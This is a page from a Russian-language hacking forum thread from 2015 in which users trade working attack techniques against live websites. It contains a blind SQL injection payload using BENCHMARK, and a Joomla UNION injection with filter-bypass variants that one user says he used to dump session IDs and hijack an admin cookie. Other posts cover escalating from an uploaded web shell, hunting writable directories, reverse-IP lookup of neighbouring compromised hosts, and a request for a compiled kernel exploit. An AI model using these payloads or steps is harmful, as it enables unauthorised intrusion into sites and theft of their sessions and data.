Старый 13.02.2015, 13:35   #3371
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Цитата:
Сообщение от nickcerdito Посмотреть сообщение
Какие есть варианты для инъекции в запросе
Код:
SELECT param1 FROM table where param2=1 LIMIT [SQL]
если фильтруется union и подавляется вывод ошибок?
Промучался час и ничего не придумал. В procedure analyse можно каким-то образом влепить SLEEP()?
Конечно, возможно, но только через альтернативу BENCHMARK.

Вектор через SLEEP() в данном случае не работает.

Пример

Цитата:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(), 1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
__________________
Первый VPN на основе Эллиптической криптографии. Телепортируйся в любой момент, будь невидимым с multi-vpn.biz
И да, это реклама. Просто очень нужен VPN.
BigBear вне форума   Ответить с цитированием
Старый 13.02.2015, 16:01   #3372
nickcerdito
 
Аватар для nickcerdito
 
Регистрация: 11.07.2012
Сообщений: 16
Репутация: 7
По умолчанию

Цитата:
Сообщение от BigBear Посмотреть сообщение
Конечно, возможно, но только через альтернативу BENCHMARK.
Вектор через SLEEP() в данном случае не работает.
Да, спасибо, я, видимо, документацию не дочитал, делал все то же самое, но через sleep.
nickcerdito вне форума   Ответить с цитированием
Старый 16.02.2015, 07:27   #3373
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Здравствуйте! Есть иньекция в Joomla, вот так норм:
0") /*!union select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39`
А если уже пхаю from #__users, jos_users и т.д. то не работает (.
Принтабельое 6 поле, ошибки мускуля нет.

Последний раз редактировалось omen666; 16.02.2015 в 07:36..
omen666 вне форума   Ответить с цитированием
Старый 16.02.2015, 08:41   #3374
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

urlencode, double urlencode, /*!12345jos_users*/, utf encode, from {x jos_users}, from `jos_users` и т. д.
реакция конкретно на jos_users? или users? или _?
faza02 вне форума   Ответить с цитированием
Старый 16.02.2015, 08:55   #3375
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
urlencode, double urlencode, /*!12345jos_users*/, utf encode, from {x jos_users}, from `jos_users` и т. д.
реакция конкретно на jos_users? или users? или _?
Конкретно на jos_ или #__
Данные в POST, не бинарные.
#__users - не работает
%23__users - не работает
%2523__users - не работает
/*!12345jos_users*/ - не работает
from `jos_users` - не работает
from `database`. `jos_users` - не работает
/*!12345#__users*/ - работает.

Вытащил сессию так:
0") /*!union select*/ 1,2,3,4,5,concat_ws(0x3a,username,userid,client_id ,session_id),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39 from /*!12345#__session*/`

Через EditThisCookie в Chrome(http://www.editthiscookie.com/) подменил куку админа и залился.
Всем спасибо за внимание!

ps
faza02, напишите примеры запросов людям на будущее с utf encode и from {x jos_users}, спасибо!

Последний раз редактировалось omen666; 16.02.2015 в 10:31..
omen666 вне форума   Ответить с цитированием
Старый 16.02.2015, 10:35   #3376
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Посоветуйте реверс ip в 1 клик, ну чтоб не копировать ип, вставлять, нажимать и т.д., так как на это все теряется время, а суть что оно делает итак понятна! Делитесь кто как юзает.

Последний раз редактировалось omen666; 16.02.2015 в 11:07..
omen666 вне форума   Ответить с цитированием
Старый 18.02.2015, 22:12   #3377
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

ребят,подсобите советом)

на сервере есть шелл(.php) c привилегиями юзера apache
на том же сервере есть скрипт-аплоадер(.cgi),который выполняется с привилегиями юзера katya
при попытке залить шелл(.php или .pl) в папку доступную для записи только юзеру katya,шелл льется и запускается с правами apache
конфиг апача(httpd.conf) не доступен для чтения
что мне показалось странным,так это залитый через аплоадер php-файл:
Код:
<?php
echo get_current_user();
system(id);
?>
выдаёт:
Цитата:
katya
uid=48(apache) gid=48(apache)
скорее всего ситация тут стандартная и глуплю я,но можно ли там выполнить код с правами katya?

Последний раз редактировалось QaRTiN; 18.02.2015 в 22:20..
QaRTiN вне форума   Ответить с цитированием
Старый 20.02.2015, 10:50   #3378
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от QaRTiN Посмотреть сообщение
ребят,подсобите советом)

на сервере есть шелл(.php) c привилегиями юзера apache
на том же сервере есть скрипт-аплоадер(.cgi),который выполняется с привилегиями юзера katya
при попытке залить шелл(.php или .pl) в папку доступную для записи только юзеру katya,шелл льется и запускается с правами apache
конфиг апача(httpd.conf) не доступен для чтения
что мне показалось странным,так это залитый через аплоадер php-файл:
Код:
<?php
echo get_current_user();
system(id);
?>
выдаёт:


скорее всего ситация тут стандартная и глуплю я,но можно ли там выполнить код с правами katya?
Ну найдите вритабельную папку и залейтесь, в чем проблема(где-то в шпоре скрипт на пыхе есть, который ищет вритабельные диры)?
А там уже походу дела посмотрите вокруг да около когда увидите всю картину
ps ну или через system и т.д. что-то в духе find / -type d -perm 0777 )

Цитата:
Посоветуйте реверс ip в 1 клик, ну чтоб не копировать ип, вставлять, нажимать и т.д., так как на это все теряется время, а суть что оно делает итак понятна! Делитесь кто как юзает.
Cамый оптимальный варант это ставим что-то типо адона IP Address and Domain Information под свой браузер.
На целевом сайте кликаем IP, выделяем, копируем Ctrl+С.
Нажимаем на сохраненную закладку Bing(вынести на панель инструментов чтоб поудобней!), или по метке в адресной строке если FF и т.д.
В Bing IP: Shift + Insert.

ps
некоторая хитрость как делать реверс ип по контенту, хотя капитан очевидность подсказывает что это итак очевидно.
Все-же если можем читать конфигы соседей с похеканных хостов, например Joomla и т.д.(впринципе применимо к любой CMS) в файле configuration.php есть описание к сайту в свойствах класса, вот как раз нужное в Bing и вставлять вместе с IP ).

Последний раз редактировалось omen666; 20.02.2015 в 11:40..
omen666 вне форума   Ответить с цитированием
Старый 22.02.2015, 09:51   #3379
dr.Pilulkin
 
Регистрация: 04.01.2011
Сообщений: 22
Репутация: 9
По умолчанию

Цитата:
Сообщение от Rus Посмотреть сообщение
пытался залить скрипт по совету гугла, который вроде как должен был помочь, но через telnet это гиблое дело, wget'a там нет.
Если cat есть.
shell# cat > script.sh
Лейте скрипт из буфера обмена потом ctrl-C в конце.
dr.Pilulkin вне форума   Ответить с цитированием
Старый 02.03.2015, 04:31   #3380
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Ребят подскажите в чём прикол?)
имеется шелл дапустим site.com/forum/shell.php
При выходе из диры /forum/ всё нормально,но ситуация такая что на сайте даже файлов таких нет что в корне.
при обращении из браузера к любому файлу что в корне идут ошибка 404
В чём прикол?
При заливке любого файла,на сайте его тоже нет якобы.
И ещё просьба,может кто скомпилить под сие чудо
Код:
Linux site 2.6.32-431.1.2.el6.x86_64 #1 SMP Thu Dec 12 13:59:19 CST 2013 x86_64 x86_64 x86_64 GNU/Linux

Последний раз редактировалось Faaax; 02.03.2015 в 05:52..
Faaax вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot